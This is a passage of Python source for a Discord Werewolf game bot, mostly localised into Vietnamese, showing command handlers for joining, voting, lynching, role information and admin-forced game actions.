client.send_message(client.get_channel(GAME_CHANNEL), random.choice(lang['leavedeath']).format(message.author.name, get_role(message.author.id, 'death'))) await client.remove_roles(client.get_server(WEREWOLF_SERVER).get_member(message.author.id), PLAYERS_ROLE) if message.author.id in stasis: stasis[message.author.id] += QUIT_GAME_STASIS else: stasis[message.author.id] = QUIT_GAME_STASIS if session[0] and win_condition() == None: await check_traitor() await log(1, "{} ({}) QUIT DURING GAME".format(message.author.display_name, message.author.id)) else: if message.author.id in session[1]: if session[0]: await reply(message, "wot?") return del session[1][message.author.id] await client.send_message(client.get_channel(GAME_CHANNEL), random.choice(lang['leavelobby']).format(message.author.name, len(session[1]))) if len(session[1]) == 0: await client.change_presence(game=client.get_server(WEREWOLF_SERVER).me.game, status=discord.Status.online) await client.remove_roles(client.get_server(WEREWOLF_SERVER).get_member(message.author.id), PLAYERS_ROLE) else: await reply(message, random.choice(lang['notplayingleave'])) @cmd('fjoin', [1, 1], "```\n{0}fjoin <mentions of users>\n\nForces each <mention> to join the game.```") async def cmd_fjoin(message, parameters): if session[0]: return if parameters == '': await reply(message, commands['fjoin'][2].format(BOT_PREFIX)) return raw_members = parameters.split(' ') join_list = [] for member in raw_members: if member.strip('<!@>').isdigit(): join_list.append(member.strip('<!@>')) elif '-' in member: left = member.split('-')[0] right = member.split('-')[1] if left.isdigit() and right.isdigit(): join_list += list(map(str, range(int(left), int(right) + 1))) if join_list == []: await reply(message, "ERROR: no valid mentions found") return join_msg = "" for member in sort_players(join_list): session[1][member] = [True, '', '', [], []] join_msg += "**" + get_name(member) + "** was forced to join the game.\n" if client.get_server(WEREWOLF_SERVER).get_member(member): await client.add_roles(client.get_server(WEREWOLF_SERVER).get_member(member), PLAYERS_ROLE) join_msg += "New player count: **{}**".format(len(session[1])) if len(session[1]) > 0: await client.change_presence(game=client.get_server(WEREWOLF_SERVER).me.game, status=discord.Status.idle) await client.send_message(message.channel, join_msg) await log(2, "{0} ({1}) used FJOIN {2}".format(message.author.name, message.author.id, parameters)) @cmd('fleave', [1, 1], "```\n{0}fleave <mentions of users | all>\n\nForces each <mention> to leave the game. If the parameter is all, removes all players from the game.```") async def cmd_fleave(message, parameters): if parameters == '': await reply(message, commands['fleave'][2].format(BOT_PREFIX)) return raw_members = parameters.split(' ') leave_list = [] if parameters == 'all': leave_list = list(session[1]) else: for member in raw_members: if member.strip('<!@>').isdigit(): leave_list.append(member.strip('<!@>')) elif '-' in member: left = member.split('-')[0] right = member.split('-')[1] if left.isdigit() and right.isdigit(): leave_list += list(map(str, range(int(left), int(right) + 1))) if leave_list == []: await reply(message, "ERROR: no valid mentions found") return leave_msg = "" for member in sort_players(leave_list): if member in list(session[1]): if session[0]: session[1][member][0] = False leave_msg += "**" + get_name(member) + "** bị đẩy vào ngọn lửa, không khí thơm mùi mỡ khét của **" + get_role(member, 'death') + "**.\n" else: del session[1][member] leave_msg += "**" + get_name(member) + "** bị bắt phải rời trò chơi.\n" if client.get_server(WEREWOLF_SERVER).get_member(member): await client.remove_roles(client.get_server(WEREWOLF_SERVER).get_member(member), PLAYERS_ROLE) if not session[0]: leave_msg += "New player count: **{}**".format(len(session[1])) if len(session[1]) == 0: await client.change_presence(game=client.get_server(WEREWOLF_SERVER).me.game, status=discord.Status.online) await client.send_message(client.get_channel(GAME_CHANNEL), leave_msg) await log(2, "{0} ({1}) used FLEAVE {2}".format(message.author.name, message.author.id, parameters)) if session[0] and win_condition() == None: await check_traitor() @cmd('refresh', [1, 1], "```\n{0}refresh [<language file>]\n\nRefreshes the current language's language file from GitHub. Admin only.```") async def cmd_refresh(message, parameters): global lang if parameters == '': parameters = MESSAGE_LANGUAGE url = "https://raw.githubusercontent.com/belguawhale/Discord-Werewolf/master/lang/{}.json".format(parameters) codeset = parameters temp_lang, temp_str = get_jsonparsed_data(url) if not temp_lang: await reply(message, "Could not refresh language {} from Github.".format(parameters)) return with open('lang/{}.json'.format(parameters), 'w', encoding='utf-8') as f: f.write(temp_str) lang = temp_lang await reply(message, 'The messages with language code `' + codeset + '` have been refreshed from GitHub.') @cmd('start', [0, 1], "```\n{0}start không cần thêm cú pháp\n\nBầu chọn bắt đầu game. Một game cần ít nhất " +\ str(MIN_PLAYERS) + " người chơi để bắt đầu.```") async def cmd_start(message, parameters): if session[0]: return if message.author.id not in session[1]: await reply(message, random.choice(lang['notplayingstart'])) return if len(session[1]) < MIN_PLAYERS: await reply(message, random.choice(lang['minplayers']).format(MIN_PLAYERS)) return if session[1][message.author.id][1]: return session[1][message.author.id][1] = 'start' votes = len([x for x in session[1] if session[1][x][1] == 'start']) votes_needed = max(2, min(len(session[1]) // 4 + 1, 4)) if votes < votes_needed: await client.send_message(client.get_channel(GAME_CHANNEL), "**{}** Đang muốn bắt đầu trò chơi. **{}** votes nữa để bắt đầu{}.".format( message.author.display_name, votes_needed - votes, '' if (votes_needed - votes == 1) else 's')) else: await run_game() if votes == 1: await start_votes(message.author.id) @cmd('fstart', [1, 2], "```\n{0}fstart takes no arguments\n\nForces game to start.```") async def cmd_fstart(message, parameters): if session[0]: return if len(session[1]) < MIN_PLAYERS: await reply(message, random.choice(lang['minplayers']).format(MIN_PLAYERS)) else: await client.send_message(client.get_channel(GAME_CHANNEL), "**" + message.author.name + "** forced the game to start.") await log(2, "{0} ({1}) FSTART".format(message.author.name, message.author.id)) await run_game() @cmd('fstop', [1, 1], "```\n{0}fstop [<-force|reason>]\n\nForcibly stops the current game with an optional [<reason>]. Use {0}fstop -force if " "bot errors.```") async def cmd_fstop(message, parameters): msg = "Game forcibly stopped by **" + message.author.name + "**" if parameters == "": msg += "." elif parameters == "-force": if not session[0]: return msg += ". Here is some debugging info:\n```py\n{0}\n```".format(str(session)) session[0] = False perms = client.get_channel(GAME_CHANNEL).overwrites_for(client.get_server(WEREWOLF_SERVER).default_role) perms.send_messages = True await client.edit_channel_permissions(client.get_channel(GAME_CHANNEL), client.get_server(WEREWOLF_SERVER).default_role, perms) for player in list(session[1]): del session[1][player] member = client.get_server(WEREWOLF_SERVER).get_member(player) if member: await client.remove_roles(member, PLAYERS_ROLE) session[3] = [0, 0] session[4] = [timedelta(0), timedelta(0)] session[6] = '' session[7] = {} await client.send_message(client.get_channel(GAME_CHANNEL), msg) return else: msg += " for reason: `" + parameters + "`." if not session[0]: await reply(message, "There is no currently running game!") return else: await log(2, "{0} ({1}) FSTOP {2}".format(message.author.name, message.author.id, parameters)) await end_game(msg + '\n\n' + end_game_stats()) @cmd('sync', [1, 1], "```\n{0}sync takes no arguments\n\nSynchronizes all player roles and channel permissions with session.```") async def cmd_sync(message, parameters): for member in client.get_server(WEREWOLF_SERVER).members: if member.id in session[1] and session[1][member.id][0]: if not PLAYERS_ROLE in member.roles: await client.add_roles(member, PLAYERS_ROLE) else: if PLAYERS_ROLE in member.roles: await client.remove_roles(member, PLAYERS_ROLE) perms = client.get_channel(GAME_CHANNEL).overwrites_for(client.get_server(WEREWOLF_SERVER).default_role) if session[0]: perms.send_messages = False else: perms.send_messages = True await client.edit_channel_permissions(client.get_channel(GAME_CHANNEL), client.get_server(WEREWOLF_SERVER).default_role, perms) await log(2, "{0} ({1}) SYNC".format(message.author.name, message.author.id)) await reply(message, "Sync successful.") @cmd('op', [1, 1], "```\n{0}op takes no arguments\n\nOps yourself if you are an admin```") async def cmd_op(message, parameters): await log(2, "{0} ({1}) OP {2}".format(message.author.name, message.author.id, parameters)) if parameters == "": await client.add_roles(client.get_server(WEREWOLF_SERVER).get_member(message.author.id), ADMINS_ROLE) await reply(message, ":thumbsup:") else: member = client.get_server(WEREWOLF_SERVER).get_member(parameters.strip("<!@>")) if member: if member.id in ADMINS: await client.add_roles(member, ADMINS_ROLE) await reply(message, ":thumbsup:") @cmd('deop', [1, 1], "```\n{0}deop takes no arguments\n\nDeops yourself so you can play with the players ;)```") async def cmd_deop(message, parameters): await log(2, "{0} ({1}) DEOP {2}".format(message.author.name, message.author.id, parameters)) if parameters == "": await client.remove_roles(client.get_server(WEREWOLF_SERVER).get_member(message.author.id), ADMINS_ROLE) await reply(message, ":thumbsup:") else: member = client.get_server(WEREWOLF_SERVER).get_member(parameters.strip("<!@>")) if member: if member.id in ADMINS: await client.remove_roles(member, ADMINS_ROLE) await reply(message, ":thumbsup:") @cmd('role', [0, 0], "```\n{0}role [<role | number of players | gamemode>] [<number of players>]\n\nNếu đưa ra tên một <role>, " "cho biết thông tin về <role> đó. Nếu cho số lượng người chơi <number of players>, Cho biết số lượng mỗi thành phần " "role for the specified <number of players> for the specified <gamemode>, defaulting to default. If " "only a <gamemode> is given, displays a role guide for <gamemode>. " "Nếu để trống, cho danh sách các vai.```", 'roles') async def cmd_role(message, parameters): if parameters == "" and not session[0] or parameters == 'list': await reply(message, "Roles: " + ", ".join(sort_roles(roles))) return elif parameters == "" and session[0]: msg = "**{}** người chơi đang chơi **{}** gamemode:```\n".format(len(session[1]), 'roles' if session[6].startswith('roles') else session[6]) if session[6] in ('random',): msg += "!role đã bị tắt cho {} gamemode.\n```".format(session[6]) await reply(message, msg) return game_roles = dict(session[7]) msg += '\n'.join(["{}: {}".format(x, game_roles[x]) for x in sort_roles(game_roles)]) msg += '```' await reply(message, msg) return elif _autocomplete(parameters, roles)[1] == 1: role = _autocomplete(parameters, roles)[0] await reply(message, "```\nTên vai: {}\nPhe: {}\nMiêu tả: {}\n```".format(role, roles[role][0], roles[role][2])) return params = parameters.split(' ') gamemode = 'default' num_players = -1 choice, num = _autocomplete(params[0], gamemodes) if num == 1: gamemode = choice if params[0].isdigit(): num_players = params[0] elif len(params) == 2 and params[1].isdigit(): num_players = params[1] if num_players == -1: if len(params) == 2: if params[1] == 'table': # generate role table WIDTH = 20 role_dict = gamemodes[gamemode]['roles'] role_guide = "Bảng role cho chế độ **{}**:\n".format(gamemode) role_guide += "```\n" + " " * (WIDTH + 2) role_guide += ','.join("{}{}".format(' ' * (2 - len(str(x))), x) for x in range(gamemodes[gamemode]['min_players'], gamemodes[gamemode]['max_players'] + 1)) + '\n' role_guide += '\n'.join(role + ' ' * (WIDTH - len(role)) + ": " + repr(\ role_dict[role][gamemodes[gamemode]['min_players'] - MIN_PLAYERS:gamemodes[gamemode]['max_players']]) for role in sort_roles(role_dict)) role_guide += "\n```" elif params[1] == 'guide': # generate role guide role_dict = gamemodes[gamemode]['roles'] prev_dict = dict((x, 0) for x in roles if x != 'villager') role_guide = 'Các role trong gamemode **{}**:\n'.format(gamemode) for i in range(gamemodes[gamemode]['max_players'] - MIN_PLAYERS + 1): current_dict = {} for role in sort_roles(roles): if role == 'villager': continue if role in role_dict: current_dict[role] = role_dict[role][i] else: current_dict[role] = 0 # compare previous and current if current_dict == prev_dict: # same continue role_guide += '**[{}]** '.format(i + MIN_PLAYERS) for role in sort_roles(roles): if role == 'villager': continue if current_dict[role] == 0 and prev_dict[role] == 0: # role not in gamemode continue if current_dict[role] > prev_dict[role]: # role increased role_guide += role if current_dict[role] > 1: role_guide += " ({})".format(current_dict[role]) role_guide += ', ' elif prev_dict[role] > current_dict[role]: role_guide += '~~{}'.format(role) if prev_dict[role] > 1: role_guide += " ({})".format(prev_dict[role]) role_guide += '~~, ' role_guide = role_guide.rstrip(', ') + '\n' # makes a copy prev_dict = dict(current_dict) else: role_guide = "Hãy chọn 1 trong 2 phụ lệnh: " + ', '.join(['guide', 'table']) else: role_guide = "Please choose one of the following for the third parameter: {}".format(', '.join(['guide', 'table'])) await reply(message, role_guide) else: num_players = int(num_players) if num_players in range(gamemodes[gamemode]['min_players'], gamemodes[gamemode]['max_players'] + 1): if gamemode in ('random',): msg = "!role đã bị tắt trong **{}** gamemode.".format(gamemode) else: msg = "Vai của **{}** người chơi trong chế độ **{}**:```\n".format(num_players, gamemode) game_roles = get_roles(gamemode, num_players) msg += '\n'.join("{}: {}".format(x, game_roles[x]) for x in sort_roles(game_roles)) msg += '```' await reply(message, msg) else: await reply(message, "Hãy chọn số người chơi trong khoảng " + str(gamemodes[gamemode]['min_players']) +\ " and " + str(gamemodes[gamemode]['max_players']) + ".") async def _send_role_info(player, sendrole=True): if session[0] and player in session[1]: member = client.get_server(WEREWOLF_SERVER).get_member(player) if member and session[1][player][0]: role = get_role(player, 'role') templates = get_role(player, 'templates') if member and session[1][player][0]: try: if sendrole: await client.send_message(member, "Vai của bạn là **" + role + "**. " + roles[role][2] + '\n') living_players = [x for x in session[1] if session[1][x][0]] living_players_string = ', '.join('**{}** ({})'.format(get_name(x), x) for x in living_players) msg = '' if roles[role][0] == 'wolf' and role != 'cultist': living_players_string = '' for plr in living_players: temprole = get_role(plr, 'role') temptemplates = get_role(plr, 'templates') role_string = '' if 'cursed' in temptemplates: role_string += 'cursed ' if roles[temprole][0] == 'wolf' and temprole != 'cultist': role_string += temprole living_players_string += "**{}** ({})".format(get_name(plr), plr) if role_string: living_players_string += " (**{}**)".format(role_string.rstrip(' ')) living_players_string += ', ' living_players_string = living_players_string.rstrip(', ') elif role == 'shaman': if session[1][player][2] in totems: totem = session[1][player][2] msg += "Bạn có bùa **{0}**. {1}".format(totem.replace('_', ' '), totems[totem]) + '\n' if role in ['wolf', 'werecrow', 'werekitten', 'traitor', 'sorcerer', 'harlot', 'seer', 'shaman', 'hunter', 'detective', 'crazed shaman']: msg += "Living players: " + living_players_string + '\n\n' if 'gunner' in templates: msg += "Bạn có 1 khẩu súng lục và **{}** viên đạn{}. Xài lệnh `{}role gunner` để biết chi tiết.".format( session[1][player][4].count('bullet'), '' if session[1][player][4].count('bullet') == 1 else 's', BOT_PREFIX) if msg != '': await client.send_message(member, msg) except discord.Forbidden: await client.send_message(client.get_channel(GAME_CHANNEL), member.mention + ", bạn không thể chơi game nếu bạn chặn tôi :<") @cmd('myrole', [0, 0], "```\n{0}myrole không cần thêm cú pháp\n\nCho bạn biết vai mình trong tin nhắn riêng.```") async def cmd_myrole(message, parameters): await _send_role_info(message.author.id) @cmd('stats', [0, 0], "```\n{0}stats không cần thêm cú pháp\n\nXem trạng thái game.```") async def cmd_stats(message, parameters): if session[0]: reply_msg = "Bây giờ là **" + ("day" if session[2] else "night") + "time**. Đang sử dụng **{}** gamemode.".format( 'roles' if session[6].startswith('roles') else session[6]) reply_msg += "\n**" + str(len(session[1])) + "** Người chơi đang chơi: **" + str(len([x for x in session[1] if session[1][x][0]])) + "** còn sống, " reply_msg += "**" + str(len([x for x in session[1] if not session[1][x][0]])) + "** đã chết\n" reply_msg += "```basic\nCòn sống:\n" + "\n".join(get_name(x) + ' (' + x + ')' for x in sort_players(session[1]) if session[1][x][0]) + '\n' reply_msg += "Đã chết:\n" + "\n".join(get_name(x) + ' (' + x + ')' for x in sort_players(session[1]) if not session[1][x][0]) + '\n' if session[6] in ('random',): reply_msg += '\n!stats ko thể dùng trong {} gamemode.```'.format(session[6]) await reply(message, reply_msg) return orig_roles = dict(session[7]) # make a copy role_dict = {} traitorvill = 0 traitor_turned = False for other in [session[1][x][4] for x in session[1]]: if 'traitor' in other: traitor_turned = True break for role in roles: # Fixes !stats crashing with !frole of roles not in game role_dict[role] = [0, 0] # [min, max] for traitor and similar roles for player in session[1]: # Get maximum numbers for all roles role_dict[get_role(player, 'role')][0] += 1 role_dict[get_role(player, 'role')][1] += 1 if get_role(player, 'role') in ['villager', 'traitor']: traitorvill += 1 #reply_msg += "Total roles: " + ", ".join(sorted([x + ": " + str(roles[x][3][len(session[1]) - MIN_PLAYERS]) for x in roles if roles[x][3][len(session[1]) - MIN_PLAYERS] > 0])).rstrip(", ") + '\n' # ^ saved this beast for posterity reply_msg += "Roles tổng cộng: " total_roles = dict(orig_roles) reply_msg += ', '.join("{}: {}".format(x, total_roles[x]) for x in sort_roles(total_roles)) for role in list(role_dict): # list is used to make a copy if role in TEMPLATES_ORDERED: del role_dict[role] if traitor_turned: role_dict['wolf'][0] += role_dict['traitor'][0] role_dict['wolf'][1] += role_dict['traitor'][1] role_dict['traitor'] = [0, 0] for player in session[1]: # Subtract dead players if not session[1][player][0]: role = get_role(player, 'role') reveal = get_role(player, 'deathstats') if role == 'traitor' and traitor_turned: # player died as traitor but traitor turn message played, so subtract from wolves reveal = 'wolf' if reveal == 'villager': traitorvill -= 1 # could be traitor or villager if 'traitor' in role_dict: role_dict['traitor'][0] = max(0, role_dict['traitor'][0] - 1) if role_dict['traitor'][1] > traitorvill: role_dict['traitor'][1] = traitorvill role_dict['villager'][0] = max(0, role_dict['villager'][0] - 1) if role_dict['villager'][1] > traitorvill: role_dict['villager'][1] = traitorvill else: # player died is definitely that role role_dict[reveal][0] = max(0, role_dict[reveal][0] - 1) role_dict[reveal][1] = max(0, role_dict[reveal][1] - 1) reply_msg += "\nRoles hiện tại: " for template in TEMPLATES_ORDERED: if template in orig_roles: del orig_roles[template] for role in sort_roles(orig_roles): if role_dict[role][0] == role_dict[role][1]: if role_dict[role][0] == 1: reply_msg += "éo bik" else: reply_msg += "éo bik" reply_msg += ": " else: reply_msg += ": {}-{}" reply_msg += ", " reply_msg = reply_msg.rstrip(", ") + "```" await reply(message, reply_msg) else: players = ["{} ({})".format(get_name(x), x) for x in sort_players(session[1])] num_players = len(session[1]) if num_players == 0: await client.send_message(message.channel, "Chưa có game nào đang diễn ra. Thử xài {}join để bắt đầu 1 game mới!".format(BOT_PREFIX)) else: await client.send_message(message.channel, "{} người chơi trong sảnh: ```\n{}\n```".format(num_players, '\n'.join(players))) @cmd('revealroles', [1, 1], "```\n{0}revealroles takes no arguments\n\nDisplays what each user's roles are and sends it in pm.```", 'rr') async def cmd_revealroles(message, parameters): msg = "**Gamemode**: {}```diff\n".format(session[6]) for player in sort_players(session[1]): msg += "{} ".format('+' if session[1][player][0] else '-') + get_name(player) + ' (' + player + '): ' + get_role(player, 'actual') msg += "; action: " + session[1][player][2] + "; other: " + ' '.join(session[1][player][4]) + "\n" msg += "```" await client.send_message(message.channel, msg) await log(2, "{0} ({1}) REVEALROLES".format(message.author.name, message.author.id)) @cmd('see', [2, 0], "```\n{0}see <player>\n\nNếu là tiên tri, dùng lệnh để xem vai của <player>.```") async def cmd_see(message, parameters): if not session[0] or message.author.id not in session[1] or not session[1][message.author.id][0]: return if not get_role(message.author.id, 'role') in COMMANDS_FOR_ROLE['see']: return if session[2]: await reply(message, "Chỉ có thể soi vào ban đêm.") return if session[1][message.author.id][2]: await reply(message, "Bạn đã dùng năng lực rồi.") else: if parameters == "": await reply(message, roles[session[1][message.author.id][1]][2]) else: player = get_player(parameters) if player: if player == message.author.id: await reply(message, "Mi tự biết mi là ai rồi ha :>.") elif player in [x for x in session[1] if not session[1][x][0]]: await reply(message, "Người chơi **" + get_name(player) + "** chết rồi!") else: session[1][message.author.id][2] = player seen_role = get_role(player, 'seen') if (session[1][player][4].count('deceit_totem2') +\ session[1][message.author.id][4].count('deceit_totem2')) % 2 == 1: if seen_role == 'wolf': seen_role = 'villager' else: seen_role = 'wolf' await reply(message, "Bạn thấy 1 điềm báo... trong điềm báo bạn thấy **" + get_name(player) + "** là một **" + seen_role + "**!") await log(1, "{0} ({1}) SEE {2} ({3}) AS {4}".format(get_name(message.author.id), message.author.id, get_name(player), player, seen_role)) else: await reply(message, "Không tìm thấy " + parameters) @cmd('kill', [2, 0], "```\n{0}kill <player>\n\nNếu là sói, bầu chọn giết <player>. Nếu là " "thợ săn, <player> sẽ chết tối hôm sau.```") async def cmd_kill(message, parameters): if not session[0] or message.author.id not in session[1] or get_role(message.author.id, 'role') not in COMMANDS_FOR_ROLE['kill'] or not session[1][message.author.id][0]: return if session[2]: await reply(message, "Chỉ có thể giết vào ban đêm.") return if parameters == "": await reply(message, roles[session[1][message.author.id][1]][2]) else: if get_role(message.author.id, 'role') == 'hunter': if 'hunterbullet' not in session[1][message.author.id][4]: await reply(message, "Bạn đã giết 1 người trong game này rồi.") return elif session[1][message.author.id][2] not in ['', message.author.id]: await reply(message, "Bạn đã chọn giết **{}** rồi.".format(get_name(session[1][message.author.id][2]))) return player = get_player(parameters) if player: if player == message.author.id: await reply(message, "Tau éo cho mầy tự tử đâu.") elif roles[get_role(message.author.id, 'role')][0] == 'wolf' and player in \ [x for x in session[1] if roles[get_role(x, 'role')][0] == 'wolf' and get_role(x, 'role') != 'cultist']: await reply(message, "Rảnh háng quá đi bóp dái đồng đội à?.") elif player in [x for x in session[1] if not session[1][x][0]]: await reply(message, "Người chơi **" + get_name(player) + "** chết rồi!") else: session[1][message.author.id][2] = player if roles[get_role(message.author.id, 'role')][0] == 'wolf': await reply(message, "Đã chọn giết **" + get_name(player) + "**.") await wolfchat("**{}** đã bầu giết **{}**.".format(get_name(message.author.id), get_name(player))) elif get_role(message.author.id, 'role') == 'hunter': await reply(message, "Bạn đã chọn giết **" + get_name(player) + "**.") await log(1, "{0} ({1}) KILL {2} ({3})".format(get_name(message.author.id), message.author.id, get_name(player), player)) else: await reply(message, "Không tìm thấy người chơi " + parameters) @cmd('vote', [0, 0], "```\n{0}vote [<gamemode | player>]\n\nVotes for <gamemode> during the join phase or votes to lynch <player> during the day. If no arguments " "are given, replies with a list of current votes.```", 'v') async def cmd_vote(message, parameters): if session[0]: await cmd_lynch(message, parameters) else: if message.channel.is_private: await reply(message, "Hãy vote ở phòng chơi.") return if parameters == "": await cmd_votes(message, parameters) else: if session[6]: await reply(message, "Một Admin đã set chế độ chơi rồi.") return if message.author.id in session[1]: choice, num = _autocomplete(parameters, gamemodes) if num == 0: await reply(message, "Không tìm thấy {}".format(parameters)) elif num == 1: session[1][message.author.id][2] = choice await reply(message, "bạn đã chọn chế độ chơi **{}**.".format(choice)) else: await reply(message, "Multiple options: {}".format(', '.join(sorted(choice)))) else: await reply(message, "Bạn không thể bầu nếu bạn không chơi!") @cmd('lynch', [0, 0], "```\n{0}lynch [<player>]\n\nbầu treo cổ [<player>] vào ban ngày. Nếu không có ai được nêu, sẽ cho danh sách votes.```") async def cmd_lynch(message, parameters): if not session[0] or not session[2]: return if parameters == "": await cmd_votes(message, parameters) else: if message.author.id not in session[1]: return if message.channel.is_private: await reply(message, "Hãy xài lệnh treo cổ ở phòng chơi.") return if 'injured' in session[1][message.author.id][4]: await reply(message, "Bạn đang chấn thương và không vote được.") return to_lynch = get_player(parameters.split(' ')[0]) if not to_lynch: to_lynch = get_player(parameters) if to_lynch: if to_lynch in [x for x in session[1] if not session[1][x][0]]: await reply(message, "Người chơi **" + get_name(to_lynch) + "** chết rồi!") else: session[1][message.author.id][2] = to_lynch await reply(message, "Bạn đã bầu chọn treo cổ **" + get_name(to_lynch) + "**.") await log(1, "{0} ({1}) LYNCH {2} ({3})".format(get_name(message.author.id), message.author.id, get_name(to_lynch), to_lynch)) else: await reply(message, "Không tìm thấy người chơi " + parameters) @cmd('votes', [0, 0], "```\n{0}votes không cần thêm cú pháp\n\nHiện thị gamemode đang bầu hoặc trạng thái vote treo cổ của ngày hôm nay.```") async def cmd_votes(message, parameters): if not session[0]: vote_dict = {'start' : []} for player in session[1]: if session[1][player][2] in vote_dict: vote_dict[session[1][player][2]].append(player) elif session[1][player][2] != '': vote_dict[session[1][player][2]] = [player] if session[1][player][1] == 'start': vote_dict['start'].append(player) reply_msg = "**{}** người chơi{} ở trong sảnh, **{}** phiếu bầu{} cần thiết để chọn chế độ chơi, **{}** phiếu bầu cần để bắt đầu game.```\n".format( len(session[1]), '' if len(session[1]) == 1 else 's', len(session[1]) // 2 + 1, '' if len(session[1]) // 2 + 1 == 1 else 's', max(2, min(len(session[1]) // 4 + 1, 4))) for gamemode in vote_dict: if gamemode == 'start': continue reply_msg += "{} ({} vote{}): {}\n".format(gamemode, len(vote_dict[gamemode]), '' if len(vote_dict[gamemode]) == 1 else 's', ', '.join(map(get_name, vote_dict[gamemode]))) reply_msg += "{} vote{} để bắt đầu: {}\n```".format(len(vote_dict['start']), '' if len(vote_dict['start']) == 1 else 's', ', '.join(map(get_name, vote_dict['start']))) await reply(message, reply_msg) elif session[0] and session[2]: vote_dict = {'abstain': []} alive_players = [x for x in session[1] if session[1][x][0]] able_voters = [x for x in alive_players if 'injured' not in session[1][x][4]] for player in able_voters: if session[1][player][2] in vote_dict: vote_dict[session[1][player][2]].append(player) elif session[1][player][2] != '': vote_dict[session[1][player][2]] = [player] abstainers = vote_dict['abstain'] reply_msg = "**{}** người chơi còn sống, **{}** phiếu bầu để treo cổ, **{}** người chơi có thể bầu, **{}** người chơi{} bỏ phiếu trắng.\n".format( len(alive_players), len(able_voters) // 2 + 1, len(able_voters), len(abstainers), '' if len(abstainers) == 1 else 's') if len(vote_dict) == 1 and vote_dict['abstain'] == []: reply_msg += "Chưa ai đưa phiếu bầu cả. Xài `{}lynch <player>` trong chat để treo cổ <player>. ".format(BOT_PREFIX, client.get_channel(GAME_CHANNEL).name) else: reply_msg += "Đang vote: ```\n" for voted in [x for x in vote_dict if x != 'abstain']: reply_msg += "{} ({}) ({} vote{}): {}\n".format( get_name(voted), voted, len(vote_dict[voted]), '' if len(vote_dict[voted]) == 1 else 's', ', '.join(['{} ({})'.format(get_name(x), x) for x in vote_dict[voted]])) reply_msg += "{} vote{} phiếu trắng: {}\n".format( len(vote_dict['abstain']), '' if len(vote_dict['abstain']) == 1 else 's', ', '.join(['{} ({})'.format(get_name(x), x) for x in vote_dict['abstain']])) reply_msg += "```" await reply(message, reply_msg) @cmd('retract', [0, 0], "```\n{0}retract không cần thêm cú pháp\n\nRút lại phiếu bầu hoặc quyết định của bạn " "khi là vai đặc biệt.```", 'r') async def cmd_retract(message, parameters): if message.author.id not in session[1]: # not playing return if not session[0] and session[1][message.author.id][2] == '' and session[1][message.author.id][1] == '': # no vote to start nor vote for gamemode return if session[0] and session[1][message.author.id][2] == '': # no target return if not session[0]: if message.channel.is_private: await reply(message, "Hãy xài lệnh ở game channel.") return session[1][message.author.id][2] = '' session[1][message.author.id][1] = '' await reply(message, "Bạn đã rút lại phiếu bầu.") elif session[0] and session[1][message.author.id][0]: if session[2]: if message.channel.is_private: await reply(message, "Hãy xài lệnh retract trong game channel.") return session[1][message.author.id][2] = '' await reply(message, "Bạn đã rút lại phiếu bầu.") await log(1, "{0} ({1}) RETRACT VOTE".format(get_name(message.author.id), message.author.id)) else: if session[1][message.author.id][1] in ACTUAL_WOLVES: if not message.channel.is_private: try: await client.send_message(message.author, "Xài lệnh retract trong chat riêng với bot.") except: pass return session[1][message.author.id][2] = '' await reply(message, "Bạn đã rút lại quyết định.") await wolfchat("**{}** đã rút lại quyết định giết.".format(get_name(message.author.id))) await log(1, "{0} ({1}) RETRACT KILL".format(get_name(message.author.id), message.author.id)) @cmd('abstain', [0, 2], "```\n{0}abstain không cần thêm cú pháp\n\nBỏ phiếu trắng cho hôm nay.```", 'abs', 'nl') async def cmd_abstain(message, parameters): if not session[0] or not session[2] or not message.author.id in [x for x in session[1] if session[1][x][0]]: return if session[4][1] == timedelta(0): await client.send_message(client.get_channel(GAME_CHANNEL), "Dân làng không thể bỏ phiếu trắng vào ngày đầu tiên. :joy:") return session[1][message.author.id][2] = 'abstain' await log(1, "{0} ({1}) ABSTAIN".format(get_name(message.author.id), message.author.id)) await client.send_message(client.get_channel(GAME_CHANNEL), "**{}** đã chọn không treo ai hôm nay.".format(get_name(message.author.id))) @cmd('coin', [0, 0], "```\n{0}coin takes no arguments\n\nFlips a coin. Don't use this for decision-making, especially not for life or death situations.```") async def cmd_coin(message, parameters): value = random.randint(1,100) reply_msg = '' if value == 1: reply_msg = 'its side' elif value == 100: reply_msg = client.user.name elif value < 50: reply_msg = 'heads' else: reply_msg = 'tails' await reply(message, 'The coin landed on **' + reply_msg + '**!') @cmd('admins', [0, 0], "```\n{0}admins Không cần thêm cú pháp\n\nĐưa danh sách admin đang online nếu xài trong chat riêng với bot, và **báo động** cho các admin nếu xài trong game channel (**USE ONLY WHEN NEEDED**).```") async def cmd_admins(message, parameters): await reply(message, 'Admin đang online: ' + ', '.join(['<@{}>'.format(x) for x in ADMINS if is_online(x)])) @cmd('fday', [1, 2], "```\n{0}fday takes no arguments\n\nForces night to end.```") async def cmd_fday(message, parameters): if session[0] and not session[2]: session[2] = True await reply(message, ":thumbsup:") await log(2, "{0} ({1}) FDAY".format(message.author.name, message.author.id)) @cmd('fnight', [1, 2], "```\n{0}fnight takes no arguments\n\nForces day to end.```") async def cmd_fnight(message, parameters): if session[0] and session[2]: session[2] = False await reply(message, ":thumbsup:") await log(2, "{0} ({1}) FNIGHT".format(message.author.name, message.author.id)) @cmd('frole', [1, 2], "```\n{0}frole <player> <role>\n\nSets <player>'s role to <role>.```") async def cmd_frole(message, parameters): if parameters == '': return player = parameters.split(' ')[0] role = parameters.split(' ', 1)[1] temp_player = get_player(player) if temp_player: if session[0]: if role in roles or role in ['cursed']: if role not in ['cursed'] + TEMPLATES_ORDERED: session[1][temp_player][1] = role if role == 'cursed villager': session[1][temp_player][1] = 'villager' for i in range(session[1][temp_player][3].count('cursed')): session[1][temp_player][3].remove('cursed') session[1][temp_player][3].append('cursed') elif role == 'cursed': for i in range(session[1][temp_player][3].count('cursed')): session[1][temp_player][3].remove('cursed') session[1][temp_player][3].append('cursed') elif role in TEMPLATES_ORDERED: for i in range(session[1][temp_player][3].count(role)): session[1][temp_player][3].remove(role) session[1][temp_player][3].append(role) await reply(message, "Successfully set **{}**'s role to **{}**.".format(get_name(temp_player), role)) else: await reply(message, "Cannot find role named **" + role + "**") else: session[1][temp_player][1] = role else: await reply(message, "Cannot find player named **" + player + "**") await log(2, "{0} ({1}) FROLE {2}".format(message.author.name, message.author.id, parameters)) @cmd('force', [1, 2], "```\n{0}force <player> <target>\n\nSets <player>'s target flag (session[1][player][2]) to <target>.```") async def cmd_force(message, parameters): if parameters == '': await reply(message, commands['force'][2].format(BOT_PREFIX)) return player = parameters.split(' ')[0] target = ' 